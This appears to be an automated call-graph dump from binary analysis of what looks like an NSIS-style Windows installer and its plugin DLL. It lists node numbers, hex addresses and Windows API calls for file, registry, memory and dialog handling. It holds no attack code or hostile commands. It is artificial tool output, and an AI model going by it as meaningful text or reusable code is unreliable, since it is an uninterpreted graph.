4381->4380 4382->4276 4383->4282 4384->4376 4386 403605 4385->4386 4387 4035cf 4386->4387 4388 40360a FreeLibrary GlobalFree 4386->4388 4387->4331 4388->4387 4388->4388 4960 401eee 4961 402a3a 18 API calls 4960->4961 4962 401ef5 4961->4962 4963 4060a5 5 API calls 4962->4963 4964 401f04 4963->4964 4965 401f1c GlobalAlloc 4964->4965 4968 401f84 4964->4968 4966 401f30 4965->4966 4965->4968 4967 4060a5 5 API calls 4966->4967 4969 401f37 4967->4969 4970 4060a5 5 API calls 4969->4970 4971 401f41 4970->4971 4971->4968 4975 405c6a wsprintfA 4971->4975 4973 401f78 4976 405c6a wsprintfA 4973->4976 4975->4973 4976->4968 4977 4014f0 SetForegroundWindow 4978 4028cf 4977->4978 4979 100015b3 4980 100014bb GlobalFree 4979->4980 4982 100015cb 4980->4982 4981 10001611 GlobalFree 4982->4981 4983 100015e6 4982->4983 4984 100015fd VirtualFree 4982->4984 4983->4981 4984->4981 4990 4018f5 4991 40192c 4990->4991 4992 402a3a 18 API calls 4991->4992 4993 401931 4992->4993 4994 4055ae 69 API calls 4993->4994 4995 40193a 4994->4995 4996 4024f7 4997 402a3a 18 API calls 4996->4997 4998 4024fe 4997->4998 5001 40597f GetFileAttributesA CreateFileA 4998->5001 5000 40250a 5001->5000 5002 4018f8 5003 402a3a 18 API calls 5002->5003 5004 4018ff 5003->5004 5005 405502 MessageBoxIndirectA 5004->5005 5006 401908 5005->5006 5007 1000103d 5008 1000101b 3 API calls 5007->5008 5009 10001056 5008->5009 5010 4014fe 5011 401506 5010->5011 5013 401519 5010->5013 5012 402a1d 18 API calls 5011->5012 5012->5013 5014 402b7f 5015 402ba7 5014->5015 5016 402b8e SetTimer 5014->5016 5017 402bfc 5015->5017 5018 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5015->5018 5016->5015 5018->5017 5019 401000 5020 401037 BeginPaint GetClientRect 5019->5020 5023 40100c DefWindowProcA 5019->5023 5021 4010f3 5020->5021 5025 401073 CreateBrushIndirect FillRect DeleteObject 5021->5025 5026 4010fc 5021->5026 5024 401179 5023->5024 5025->5021 5027 401102 CreateFontIndirectA 5026->5027 5028 401167 EndPaint 5026->5028 5027->5028 5029 401112 6 API calls 5027->5029 5028->5024 5029->5028 5030 404680 5031 404690 5030->5031 5032 4046ac 5030->5032 5041 4054e6 GetDlgItemTextA 5031->5041 5034 4046b2 SHGetPathFromIDListA 5032->5034 5035 4046df 5032->5035 5037 4046c2 5034->5037 5040 4046c9 SendMessageA 5034->5040 5036 40469d SendMessageA 5036->5032 5038 40140b 2 API calls 5037->5038 5038->5040 5040->5035 5041->5036 3728 402482 3739 402b44 3728->3739 3730 40248c 3743 402a1d 3730->3743 3732 402495 3733 4026a6 3732->3733 3734 40249f 3732->3734 3735 4024b8 RegEnumValueA 3734->3735 3736 4024ac RegEnumKeyA 3734->3736 3735->3733 3737 4024d1 RegCloseKey 3735->3737 3736->3737 3737->3733 3746 402a3a 3739->3746 3741 402b5d 3742 402b6b RegOpenKeyExA 3741->3742 3742->3730 3744 405d2e 18 API calls 3743->3744 3745 402a31 3744->3745 3745->3732 3747 402a46 3746->3747 3752 405d2e 3747->3752 3750 402a73 3750->3741 3757 405d3b 3752->3757 3753 405f5e 3754 402a67 3753->3754 3786 405d0c lstrcpynA 3753->3786 3754->3750 3770 405f77 3754->3770 3756 405ddc GetVersion 3756->3757 3757->3753 3757->3756 3758 405f35 lstrlenA 3757->3758 3761 405d2e 10 API calls 3757->3761 3763 405e54 GetSystemDirectoryA 3757->3763 3764 405e67 GetWindowsDirectoryA 3757->3764 3765 405f77 5 API calls 3757->3765 3766 405e9b SHGetSpecialFolderLocation 3757->3766 3767 405d2e 10 API calls 3757->3767 3768 405ede lstrcatA 3757->3768 3779 405bf3 RegOpenKeyExA 3757->3779 3784 405c6a wsprintfA 3757->3784 3785 405d0c lstrcpynA 3757->3785 3758->3757 3761->3758 3763->3757 3764->3757 3765->3757 3766->3757 3769 405eb3 SHGetPathFromIDListA CoTaskMemFree 3766->3769 3767->3757 3768->3757 3769->3757 3777 405f83 3770->3777 3771 405feb 3772 405fef CharPrevA 3771->3772 3774 40600a 3771->3774 3772->3771 3773 405fe0 CharNextA 3773->3771 3773->3777 3774->3750 3776 405fce CharNextA 3776->3777 3777->3771 3777->3773 3777->3776 3778 405fdb CharNextA 3777->3778 3787 4057a9 3777->3787 3778->3773 3780 405c64 3779->3780 3781 405c26 RegQueryValueExA 3779->3781 3780->3757 3783 405c47 RegCloseKey 3781->3783 3783->3780 3784->3757 3785->3757 3786->3754 3788 4057af 3787->3788 3789 4057c2 3788->3789 3790 4057b5 CharNextA 3788->3790 3789->3777 3790->3788 5042 401b02 5043 402a3a 18 API calls 5042->5043 5044 401b09 5043->5044 5045 402a1d 18 API calls 5044->5045 5046 401b12 wsprintfA 5045->5046 5047 4028cf 5046->5047 5048 401a03 5049 402a3a 18 API calls 5048->5049 5050 401a0c ExpandEnvironmentStringsA 5049->5050 5051 401a20 5050->5051 5053 401a33 5050->5053 5052 401a25 lstrcmpA 5051->5052 5051->5053 5052->5053 5054 402283 5055 402291 5054->5055 5056 40228b 5054->5056 5057 4022a1 5055->5057 5059 402a3a 18 API calls 5055->5059 5058 402a3a 18 API calls 5056->5058 5060 402a3a 18 API calls 5057->5060 5062 4022af 5057->5062 5058->5055 5059->5057 5060->5062 5061 402a3a 18 API calls 5063 4022b8 WritePrivateProfileStringA 5061->5063 5062->5061 5064 100029c3 5065 100029db 5064->5065 5066 10001534 2 API calls 5065->5066 5067 100029f6 5066->5067 5068 404005 lstrcpynA lstrlenA 3961 402308 3962 402338 3961->3962 3963 40230d 3961->3963 3965 402a3a 18 API calls 3962->3965 3964 402b44 19 API calls 3963->3964 3966 402314 3964->3966 3968 40233f 3965->3968 3967 40231e 3966->3967 3969 402357 3966->3969 3970 402a3a 18 API calls 3967->3970 3974 402a7a RegOpenKeyExA 3968->3974 3972 402325 RegDeleteValueA RegCloseKey 3970->3972 3972->3969 3978 402aa5 3974->3978 3983 402355 3974->3983 3975 402acb RegEnumKeyA 3976 402add RegCloseKey 3975->3976 3975->3978 3984 4060a5 GetModuleHandleA 3976->3984 3977 402b02 RegCloseKey 3977->3983 3978->3975 3978->3976 3978->3977 3980 402a7a 5 API calls 3978->3980 3980->3978 3982 402b1d RegDeleteKeyA 3982->3983 3983->3969 3985 4060c1 3984->3985 3986 4060cb GetProcAddress 3984->3986 3990 406037 GetSystemDirectoryA 3985->3990 3988 402aed 3986->3988 3988->3982 3988->3983 3989 4060c7 3989->3986 3989->3988 3991 406059 wsprintfA LoadLibraryExA 3990->3991 3991->3989 5069 402688 5070 402a3a 18 API calls 5069->5070 5071 40268f FindFirstFileA 5070->5071 5072 4026b2 5071->5072 5076 4026a2 5071->5076 5073 4026b9 5072->5073 5077 405c6a wsprintfA 5072->5077 5078 405d0c lstrcpynA 5073->5078 5077->5073 5078->5076 5079 401c8a 5080 402a1d 18 API calls 5079->5080 5081 401c90 IsWindow 5080->5081 5082 4019f3 5081->5082 4389 402410 4390 402b44 19 API calls 4389->4390 4391 40241a 4390->4391 4392 402a3a 18 API calls 4391->4392 4393 402423 4392->4393 4394 40242d RegQueryValueExA 4393->4394 4396 4026a6 4393->4396 4395 40244d 4394->4395 4399 402453 RegCloseKey 4394->4399 4395->4399 4400 405c6a wsprintfA 4395->4400 4399->4396 4400->4399 4401 401f90 4402 401fa2 4401->4402 4411 402050 4401->4411 4403 402a3a 18 API calls 4402->4403 4405 401fa9 4403->4405 4404 401423 25 API calls 4412 4021c9 4404->4412 4406 402a3a 18 API calls 4405->4406 4407 401fb2 4406->4407 4408 401fc7 LoadLibraryExA 4407->4408 4409 401fba GetModuleHandleA 4407->4409 4410 401fd7 GetProcAddress 4408->4410 4408->4411 4409->4408 4409->4410 4413 402023 4410->4413 4414 401fe6 4410->4414 4411->4404 4417 404f25 25 API calls 4413->4417 4415 402005 4414->4415 4416 401fee 4414->4416 4422 100016bd 4415->4422 4419 401423 25 API calls 4416->4419 4418 401ff6 4417->4418 4418->4412 4420 402044 FreeLibrary 4418->4420 4419->4418 4420->4412 4423 100016ed 4422->4423 4463 10001a5d 4423->4463 4425 100016f4 4426 1000180a 4425->4426 4427 10001705 4425->4427 4428 1000170c 4425->4428 4426->4418 4513 100021b0 4427->4513 4495 100021fa 4428->4495 4433 10001770 4439 100017b2 4433->4439 4440 10001776 4433->4440 4434 10001752 4526 100023da 4434->4526 4435 10001722 4438 10001728 4435->4438 4442 10001733 4435->4442 4436 1000173b 4449 10001731 4436->4449 4523 10002aa3 4436->4523 4438->4449 4507 100027e8 4438->4507 4446 100023da 9 API calls 4439->4446 4444 10001559 3 API calls 4440->4444 4441 10001758 4536 10001559 4441->4536 4517 10002589 4442->4517 4451 1000178c 4444->4451 4447 100017a4 4446->4447 4455 100017f9 4447->4455 4544 100023a0 4447->4544 4449->4433 4449->4434 4454 100023da 9 API calls 4451->4454 4452 1000175e 4457 10001764 GlobalFree 4452->4457 4453 10001739 4453->4449 4454->4447 4455->4426 4458 10001803 GlobalFree 4455->4458 4457->4447 4458->4426 4460 100017e5 4460->4455 4548 100014e2 wsprintfA 4460->4548 4461 100017de FreeLibrary 4461->4460 4550 10001215 GlobalAlloc 4463->4550 4465 10001a81 4551 10001215 GlobalAlloc 4465->4551 4467 10001cbb GlobalFree GlobalFree GlobalFree 4468 10001cd8 4467->4468 4478 10001d22 4467->4478 4469 1000201a 4468->4469 4477 10001ced 4468->4477 4468->4478 4471 1000203c GetModuleHandleA 4469->4471 4469->4478 4470 10001b60 GlobalAlloc 4484 10001a8c 4470->4484 4472 10002062 4471->4472 4473 1000204d LoadLibraryA 4471->4473 4558 100015a4 GetProcAddress 4472->4558 4473->4472 4473->4478 4474 10001bab lstrcpyA 4479 10001bb5 lstrcpyA 4474->4479 4475 10001bc9 GlobalFree 4475->4484 4477->4478 4554 10001224 4477->4554 4478->4425 4479->4484 4480 100020b3 4480->4478 4481 100020c0 lstrlenA 4480->4481 4559 100015a4 GetProcAddress 4481->4559 4483 10001f7a 4483->4478 4488 10001fbe lstrcpyA 4483->4488 4484->4467 4484->4470 4484->4474 4484->4475 4484->4478 4484->4479 4484->4483 4490 10001e75 GlobalFree 4484->4490 4492 10001224 2 API calls 4484->4492 4494 10001c07 4484->4494 4557 10001215 GlobalAlloc 4484->4557 4485 10002074 4485->4480 4493 1000209d GetProcAddress 4485->4493 4488->4478 4489 100020d9 4489->4478 4490->4484 4492->4484 4493->4480 4494->4484 4552 10001534 GlobalSize GlobalAlloc 4494->4552 4504 10002212 4495->4504 4496 10001224 GlobalAlloc lstrcpynA 4496->4504 4498 10002349 GlobalFree 4499 10001712 4498->4499 4498->4504 4499->4435 4499->4436 4499->4449 4500 100022b9 GlobalAlloc MultiByteToWideChar 4502 100022e3 GlobalAlloc 4500->4502 4503 10002303 4500->4503 4501 1000230a lstrlenA 4501->4498 4501->4503 4505 100022fa GlobalFree 4502->4505 4503->4498 4565 1000251d 4503->4565 4504->4496 4504->4498 4504->4500 4504->4501 4561 100012ad 4504->4561 4505->4498 4509 100027fa 4507->4509 4508 1000289f VirtualAlloc 4510 100028bd 4508->4510 4509->4508 4511 100029b9 4510->4511 4512 100029ae GetLastError 4510->4512 4511->4449 4512->4511 4514 100021c0 4513->4514 4515 1000170b 4513->4515 4514->4515 4516 100021d2 GlobalAlloc 4514->4516 4515->4428 4516->4514 4521 100025a5 4517->4521 4518 100025f6 GlobalAlloc 4522 10002618 4518->4522 4519 10002609 4520 1000260e GlobalSize 4519->4520 4519->4522 4520->4522 4521->4518 4521->4519 4522->4453 4524 10002aae 4523->4524 4525 10002aee GlobalFree 4524->4525 4568 10001215 GlobalAlloc 4526->4568 4528 1000243a lstrcpynA 4532 100023e6 4528->4532 4529 1000244b StringFromGUID2 WideCharToMultiByte 4529->4532 4530 1000246f WideCharToMultiByte 4530->4532 4531 100024b4 GlobalFree 4531->4532 4532->4528 4532->4529 4532->4530 4532->4531 4533 10002490 wsprintfA 4532->4533 4534 100024ee GlobalFree 4532->4534 4569 100012d1 4532->4569 4533->4532 4534->4441 4573 10001215 GlobalAlloc 4536->4573 4538 1000155f 4539 1000156c lstrcpyA 4538->4539 4541 10001586 4538->4541 4542 100015a0 4539->4542 4541->4542 4543 1000158b wsprintfA 4541->4543 4542->4452 4543->4542 4545 100017c5 4544->4545 4546 100023ae 4544->4546 4545->4460 4545->4461 4546->4545 4547 100023c7 GlobalFree 4546->4547 4547->4546 4549 10001503 4548->4549 4549->4455 4550->4465 4551->4484 4553 10001552 4552->4553 4553->4494 4560 10001215 GlobalAlloc 4554->4560 4556 10001233 lstrcpynA 4556->4478 4557->4484 4558->4485 4559->4489 4560->4556 4562 100012b4 4561->4562 4563 10001224 2 API calls 4562->4563 4564 100012cf 4563->4564 4564->4504 4566 10002581 4565->4566 4567 1000252b VirtualAlloc 4565->4567 4566->4503 4567->4566 4568->4532 4570 100012f9 4569->4570 4571 100012da 4569->4571 4570->4532 4571->4570 4572 100012e0 lstrcpyA 4571->4572 4572->4570 4573->4538 5083 401490 5084 404f25 25 API calls 5083->5084 5085 401497 5084->5085 4636 401595 4637 402a3a 18 API calls 4636->4637 4638 40159c SetFileAttributesA 4637->4638 4639 4015ae 4638->4639 4645 402616 4646 40261d 4645->4646 4652 40287c 4645->4652 4647 402a1d 18 API calls 4646->4647 4648 402628 4647->4648 4649 40262f SetFilePointer 4648->4649 4650 40263f 4649->4650 4649->4652 4653 405c6a wsprintfA 4650->4653 4653->4652 5086 401717 5087 402a3a 18 API calls 5086->5087 5088 40171e SearchPathA 5087->5088 5089 401739 5088->5089 5090 10001058 5092 10001074 5090->5092 5091 100010dc 5092->5091 5093 100014bb GlobalFree 5092->5093 5094 10001091 5092->5094 5093->5094 5095 100014bb GlobalFree 5094->5095 5096 100010a1 5095->5096 5097 100010b1 5096->5097 5098 100010a8 GlobalSize 5096->5098 5099 100010b5 GlobalAlloc 5097->5099 5100 100010c6 5097->5100 5098->5097 5101 100014e2 wsprintfA 5099->5101 5102 100010d1 GlobalFree 5100->5102 5101->5100 5102->5091 5103 404e99 5104 404ea9 5103->5104 5105 404ebd 5103->5105 5106 404eaf 5104->5106 5115 404f06 5104->5115 5107 404ec5 IsWindowVisible 5105->5107 5111 404edc 5105->5111 5109 403f3d SendMessageA 5106->5109 5110 404ed2 5107->5110 5107->5115 5108 404f0b CallWindowProcA 5112 404eb9 5108->5112 5109->5112 5116 4047f0 SendMessageA 5110->5116 5111->5108 5121 404870 5111->5121 5115->5108 5117 404813 GetMessagePos ScreenToClient SendMessageA 5116->5117 5118 40484f SendMessageA 5116->5118 5119 404847 5117->5119 5120 40484c 5117->5120 5118->5119 5119->5111 5120->5118 5130 405d0c lstrcpynA 5121->5130 5123 404883 5131 405c6a wsprintfA 5123->5131 5125 40488d 5126 40140b 2 API calls 5125->5126 5127 404896 5126->5127 5132 405d0c lstrcpynA 5127->5132 5129 40489d 5129->5115 5130->5123 5131->5125 5132->5129 5133 402519 5134 40252e 5133->5134 5135 40251e 5133->5135 5137 402a3a 18 API calls 5134->5137 5136 402a1d 18 API calls 5135->5136 5139 402527 5136->5139 5138 402535 lstrlenA 5137->5138 5138->5139 5140 405a26 WriteFile 5139->5140 5141 402557 5139->5141 5140->5141 5142 40149d 5143 4014ab PostQuitMessage 5142->5143 5144 40226e 5142->5144 5143->5144 4669 403a1e 4670 403b71 4669->4670 4671 403a36 4669->4671 4673 403b82 GetDlgItem GetDlgItem 4670->4673 4674 403bc2 4670->4674 4671->4670 4672 403a42 4671->4672 4676 403a60 4672->4676 4677 403a4d SetWindowPos 4672->4677 4678 403ef1 19 API calls 4673->4678 4675 403c1c 4674->4675 4686 401389 2 API calls 4674->4686 4680 403f3d SendMessageA 4675->4680 4687 403b6c 4675->4687 4681 403a65 ShowWindow 4676->4681 4682 403a7d 4676->4682 4677->4676 4679 403bac SetClassLongA 4678->4679 4683 40140b 2 API calls 4679->4683 4707 403c2e 4680->4707 4681->4682 4684 403a85 DestroyWindow 4682->4684 4685 403a9f 4682->4685 4683->4674 4688 403e7a 4684->4688 4689 403aa4 SetWindowLongA 4685->4689 4690 403ab5 4685->4690 4691 403bf4 4686->4691 4688->4687 4700 403eab ShowWindow 4688->4700 4689->4687 4693 403ac1 GetDlgItem 4690->4693 4694 403b5e 4690->4694 4691->4675 4695 403bf8 SendMessageA 4691->4695 4692 403e7c DestroyWindow EndDialog 4692->4688 4697 403af1 4693->4697 4698 403ad4 SendMessageA IsWindowEnabled 4693->4698 4699 403f58 8 API calls 4694->4699 4695->4687 4696 40140b 2 API calls 4696->4707 4702 403afe 4697->4702 4704 403b45 SendMessageA 4697->4704 4705 403b11 4697->4705 4713 403af6 4697->4713 4698->4687 4698->4697 4699->4687 4700->4687 4701 405d2e 18 API calls 4701->4707 4702->4704 4702->4713 4703 403eca SendMessageA 4706 403b2c 4703->4706 4704->4694 4708 403b19 4705->4708 4709 403b2e 4705->4709 4706->4694 4707->4687 4707->4692 4707->4696 4707->4701 4710 403ef1 19 API calls 4707->4710 4715 403ef1 19 API calls 4707->4715 4730 403dbc DestroyWindow 4707->4730 4712 40140b 2 API calls 4708->4712 4711 40140b 2 API calls 4709->4711 4710->4707 4714 403b35 4711->4714 4712->4713 4713->4703 4714->4694 4714->4713 4716 403ca9 GetDlgItem 4715->4716 4717 403cc6 ShowWindow KiUserCallbackDispatcher 4716->4717 4718 403cbe 4716->4718 4739 403f13 KiUserCallbackDispatcher 4717->4739 4718->4717 4720 403cf0 EnableWindow 4723 403d04 4720->4723 4721 403d09 GetSystemMenu EnableMenuItem SendMessageA 4722 403d39 SendMessageA 4721->4722 4721->4723 4722->4723 4723->4721 4740 403f26 SendMessageA 4723->4740 4741 405d0c lstrcpynA 4723->4741 4726 403d67 lstrlenA 4727 405d2e 18 API calls 4726->4727 4728 403d78 SetWindowTextA 4727->4728 4729 401389 2 API calls 4728->4729 4729->4707 4730->4688 4731 403dd6 CreateDialogParamA 4730->4731 4731->4688 4732 403e09 4731->4732 4733 403ef1 19 API calls 4732->4733 4734 403e14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4733->4734 4735 401389 2 API calls 4734->4735 4736 403e5a 4735->4736 4736->4687 4737 403e62 ShowWindow 4736->4737 4738 403f3d SendMessageA 4737->4738 4738->4688 4739->4720 4740->4723 4741->4726 5145 100010e0 5153 1000110e 5145->5153 5146 100011c4 GlobalFree 5147 100012ad 2 API calls 5147->5153 5148 100011c3 5148->5146 5149 10001155 GlobalAlloc 5149->5153 5150 100011ea GlobalFree 5150->5153 5151 100011b1 GlobalFree 5151->5153 5152 100012d1 lstrcpyA 5152->5153 5153->5146 5153->5147 5153->5148 5153->5149 5153->5150 5153->5151 5153->5152 5154 4048a2 GetDlgItem GetDlgItem 5155 4048f4 7 API calls 5154->5155 5164 404b0c 5154->5164 5156 404997 DeleteObject 5155->5156 5157 40498a SendMessageA 5155->5157 5158 4049a0 5156->5158 5157->5156 5160 4049d7 5158->5160 5163 405d2e 18 API calls 5158->5163 5159 404bf0 5162 404c9c 5159->5162 5171 404c49 SendMessageA 5159->5171 5196 404aff 5159->5196 5161 403ef1 19 API calls 5160->5161 5165 4049eb 5161->5165 5166 404ca6 SendMessageA 5162->5166 5167 404cae 5162->5167 5168 4049b9 SendMessageA SendMessageA 5163->5168 5164->5159 5169 4047f0 5 API calls 5164->5169 5197 404b7d 5164->5197 5170 403ef1 19 API calls 5165->5170 5166->5167 5174 404cc0 ImageList_Destroy 5167->5174 5175 404cc7 5167->5175 5190 404cd7 5167->5190 5168->5158 5169->5197 5176 4049f9 5170->5176 5178 404c5e SendMessageA 5171->5178 5171->5196 5172 403f58 8 API calls 5179 404e92 5172->5179 5173 404be2 SendMessageA 5173->5159 5174->5175 5180 404cd0 GlobalFree 5175->5180 5175->5190 5181 404acd GetWindowLongA SetWindowLongA 5176->5181 5189 404a48 SendMessageA 5176->5189 5192 404ac7 5176->5192 5193 404a84 SendMessageA 5176->5193 5194 404a95 SendMessageA 5176->5194 5177 404e46 5182 404e58 ShowWindow GetDlgItem ShowWindow 5177->5182 5177->5196 5184 404c71 5178->5184 5180->5190 5183 404ae6 5181->5183 5182->5196 5185 404b04 5183->5185 5186 404aec ShowWindow 5183->5186 5191 404c82 SendMessageA 5184->5191 5206 403f26 SendMessageA 5185->5206 5205 403f26 SendMessageA 5186->5205 5189->5176 5190->5177 5195 404870 4 API calls 5190->5195 5201 404d12 5190->5201 5191->5162 5192->5181 5192->5183 5193->5176 5194->5176 5195->5201 5196->5172 5197->5159 5197->5173 5198 404e1c InvalidateRect 5198->5177 5199 404e32 5198->5199 5207 4047ab 5199->5207 5200 404d40 SendMessageA 5203 404d56 5200->5203 5201->5200 5201->5203 5203->5198 5204 404dca SendMessageA SendMessageA 5203->5204 5204->5203 5205->5196 5206->5164 5210 4046e6 5207->5210 5209 4047c0 5209->5177 5211 4046fc 5210->5211 5212 405d2e 18 API calls 5211->5212 5213 404760 5212->5213 5214 405d2e 18 API calls 5213->5214 5215 40476b 5214->5215 5216 405d2e 18 API calls 5215->5216 5217 404781 lstrlenA wsprintfA SetDlgItemTextA 5216->5217 5217->5209 5218 10002162 5219 100021f6 5218->5219 5220 100021c0 5218->5220 5220->5219 5221 100021d2 GlobalAlloc 5220->5221 5221->5220 5222 401ca7 5223 402a1d 18 API calls 5222->5223 5224 401cae 5223->5224 5225 402a1d 18 API calls 5224->5225 5226 401cb6 GetDlgItem 5225->5226 5227 402513 5226->5227 4008 40192a 4009 40192c 4008->4009 4010 402a3a 18 API calls 4009->4010 4011 401931 4010->4011 4014 4055ae 4011->4014 4054 40586c 4014->4054 4017 4055d6 DeleteFileA 4019 40193a 4017->4019 4018 4055ed 4021 40571b 4018->4021 4068 405d0c lstrcpynA 4018->4068 4021->4019 4086 406010 FindFirstFileA 4021->4086 4022 405613 4023 405626 4022->4023 4024 405619 lstrcatA 4022->4024 4069 4057c5 lstrlenA 4023->4069 4025 40562c 4024->4025 4028 40563a lstrcatA 4025->4028 4030 405645 lstrlenA FindFirstFileA 4025->4030 4028->4030 4030->4021 4033 405669 4030->4033 4031 405743 4089 40577e lstrlenA CharPrevA 4031->4089 4035 4057a9 CharNextA 4033->4035 4040 4056fa FindNextFileA 4033->4040 4051 4056bb 4033->4051 4073 405d0c lstrcpynA 4033->4073 4035->4033 4036 405566 5 API calls 4037 405755 4036->4037 4038 405759 4037->4038 4039 40576f 4037->4039 4038->4019 4044 404f25 25 API calls 4038->4044 4042 404f25 25 API calls 4039->4042 4040->4033 4043 405712 FindClose 4040->4043 4042->4019 4043->4021 4045 405766 4044->4045 4046 405bc7 38 API calls 4045->4046 4049 40576d 4046->4049 4048 4055ae 62 API calls 4048->4051 4049->4019 4050 404f25 25 API calls 4050->4040 4051->4040 4051->4048 4051->4050 4052 404f25 25 API calls 4051->4052 4074 405566 4051->4074 4082 405bc7 MoveFileExA 4051->4082 4052->4051 4092 405d0c lstrcpynA 4054->4092 4056 40587d 4093 405817 CharNextA CharNextA 4056->4093 4059 4055ce 4059->4017 4059->4018 4060 405f77 5 API calls 4066 405893 4060->4066 4061 4058be lstrlenA 4062 4058c9 4061->4062 4061->4066 4064 40577e 3 API calls 4062->4064 4063 406010 2 API calls 4063->4066 4065 4058ce GetFileAttributesA 4064->4065 4065->4059 4066->4059 4066->4061 4066->4063 4067 4057c5 2 API calls 4066->4067 4067->4061 4068->4022 4070 4057d2 4069->4070 4071 4057e3 4070->4071 4072 4057d7 CharPrevA 4070->4072 4071->4025 4072->4070 4072->4071 4073->4033 4099 40595a GetFileAttributesA 4074->4099 4077 405593 4077->4051 4078 405581 RemoveDirectoryA 4080 40558f 4078->4080 4079 405589 DeleteFileA 4079->4080 4080->4077 4081 40559f SetFileAttributesA 4080->4081 4081->4077 4083 405be8 4082->4083 4084 405bdb 4082->4084 4083->4051 4102 405a55 lstrcpyA 4084->4102 4087 40573f 4086->4087 4088 406026 FindClose 4086->4088 4087->4019 4087->4031 4088->4087 4090 405749 4089->4090 4091 405798 lstrcatA 4089->4091 4090->4036 4091->4090 4092->4056 4094 405842 4093->4094 4095 405832 4093->4095 4097 4057a9 CharNextA 4094->4097 4098 405862 4094->4098 4095->4094 4096 40583d CharNextA 4095->4096 4096->4098 4097->4094 4098->4059 4098->4060 4100 405572 4099->4100 4101 40596c SetFileAttributesA 4099->4101 4100->4077 4100->4078 4100->4079 4101->4100 4103 405aa3 GetShortPathNameA 4102->4103 4104 405a7d 4102->4104 4106 405bc2 4103->4106 4107 405ab8 4103->4107 4129 40597f GetFileAttributesA CreateFileA 4104->4129 4106->4083 4107->4106 4109 405ac0 wsprintfA 4107->4109 4108 405a87 CloseHandle GetShortPathNameA 4108->4106 4110 405a9b 4108->4110 4111 405d2e 18 API calls 4109->4111 4110->4103 4110->4106 4112 405ae8 4111->4112 4130 40597f GetFileAttributesA CreateFileA 4112->4130 4114 405af5 4114->4106 4115 405b04 GetFileSize GlobalAlloc 4114->4115 4116 405b26 4115->4116 4117 405bbb CloseHandle 4115->4117 4118 4059f7 ReadFile 4116->4118 4117->4106 4119 405b2e 4118->4119 4119->4117 4131 4058e4 lstrlenA 4119->4131 4122 405b45 lstrcpyA 4125 405b67 4122->4125 4123 405b59 4124 4058e4 4 API calls 4123->4124 4124->4125 4126 405b9e SetFilePointer 4125->4126 4127 405a26 WriteFile 4126->4127 4128 405bb4 GlobalFree 4127->4128 4128->4117 4129->4108 4130->4114 4132 405925 lstrlenA 4131->4132 4133 4058fe lstrcmpiA 4132->4133 4135 40592d 4132->4135 4134 40591c CharNextA 4133->4134 4133->4135 4134->4132 4135->4122 4135->4123 5228 4028aa SendMessageA 5229 4028c4 InvalidateRect 5228->5229 5230 4028cf 5228->5230 5229->5230 5231 40432f 5232 40435b 5231->5232 5233 40436c 5231->5233 5292 4054e6 GetDlgItemTextA 5232->5292 5235 404378 GetDlgItem 5233->5235 5236 4043d7 5233->5236 5239 40438c 5235->5239 5237 4044bb 5236->5237 5244 405d2e 18 API calls 5236->5244 5290 404665 5236->5290 5237->5290 5294 4054e6 GetDlgItemTextA 5237->5294 5238 404366 5240 405f77 5 API calls 5238->5240 5242 4043a0 SetWindowTextA 5239->5242 5243 405817 4 API calls 5239->5243 5240->5233 5246 403ef1 19 API calls 5242->5246 5248 404396 5243->5248 5249 40444b SHBrowseForFolderA 5244->5249 5245 4044eb 5250 40586c 18 API calls 5245->5250 5251 4043bc 5246->5251 5247 403f58 8 API calls 5252 404679 5247->5252 5248->5242 5256 40577e 3 API calls 5248->5256 5249->5237 5253 404463 CoTaskMemFree 5249->5253 5254 4044f1 5250->5254 5255 403ef1 19 API calls 5251->5255 5257 40577e 3 API calls 5253->5257 5295 405d0c lstrcpynA 5254->5295 5258 4043ca 5255->5258 5256->5242 5262 404470 5257->5262 5293 403f26 SendMessageA 5258->5293 5261 4044a7 SetDlgItemTextA 5261->5237 5262->5261 5267 405d2e 18 API calls 5262->5267 5263 4043d0 5265 4060a5 5 API calls 5263->5265 5264 404508 5266 4060a5 5 API calls 5264->5266 5265->5236 5273 40450f 5266->5273 5268 40448f lstrcmpiA 5267->5268 5268->5261 5271 4044a0 lstrcatA 5268->5271 5269 40454b 5296 405d0c lstrcpynA 5269->5296 5271->5261 5272 404552 5274 405817 4 API calls 5272->5274 5273->5269 5277 4057c5 2 API calls 5273->5277 5279 4045a3 5273->5279 5275 404558 GetDiskFreeSpaceA 5274->5275 5278 40457c MulDiv 5275->5278 5275->5279 5277->5273 5278->5279 5280 404614 5279->5280 5282 4047ab 21 API calls 5279->5282 5281 404637 5280->5281 5283 40140b 2 API calls 5280->5283 5297 403f13 KiUserCallbackDispatcher 5281->5297 5284 404601 5282->5284 5283->5281 5286 404616 SetDlgItemTextA 5284->5286 5287 404606 5284->5287 5286->5280 5289 4046e6 21 API calls 5287->5289 5288 404653 5288->5290 5298 4042c4 5288->5298 5289->5280 5290->5247 5292->5238 5293->5263 5294->5245 5295->5264 5296->5272 5297->5288 5299 4042d2 5298->5299 5300 4042d7 SendMessageA 5298->5300 5299->5300 5300->5290 4616 4015b3 4617 402a3a 18 API calls 4616->4617 4618 4015ba 4617->4618 4619 405817 4 API calls 4618->4619 4632 4015c2 4619->4632 4620 40161c 4622 401621 4620->4622 4623 40164a 4620->4623 4621 4057a9 CharNextA 4621->4632 4624 401423 25 API calls 4622->4624 4625 401423 25 API calls 4623->4625 4626 401628 4624->4626 4629 401642 4625->4629 4635 405d0c lstrcpynA 4626->4635 4627 405468 2 API calls 4627->4632 4630 405485 5 API calls 4630->4632 4631 401633 SetCurrentDirectoryA 4631->4629 4632->4620 4632->4621 4632->4627 4632->4630 4633 401604 GetFileAttributesA 4632->4633 4634 4053eb 4 API calls 4632->4634 4633->4632 4634->4632 4635->4631 5301 4016b3 5302 402a3a 18 API calls 5301->5302 5303 4016b9 GetFullPathNameA 5302->5303 5304 4016d0 5303->5304 5305 4016f1 5303->5305 5304->5305 5308 406010 2 API calls 5304->5308 5306 401705 GetShortPathNameA 5305->5306 5307 4028cf 5305->5307 5306->5307 5309 4016e1 5308->5309 5309->5305 5311 405d0c lstrcpynA 5309->5311 5311->5305 5312 4014b7 5313 4014bd 5312->5313 5314 401389 2 API calls 5313->5314 5315 4014c5 5314->5315 5316 401d38 GetDC GetDeviceCaps 5317 402a1d 18 API calls 5316->5317 5318 401d56 MulDiv ReleaseDC 5317->5318 5319 402a1d 18 API calls 5318->5319 5320 401d75 5319->5320 5321 405d2e 18 API calls 5320->5321 5322 401dae CreateFontIndirectA 5321->5322 5323 402513 5322->5323 5324 40403a 5325 404050 5324->5325 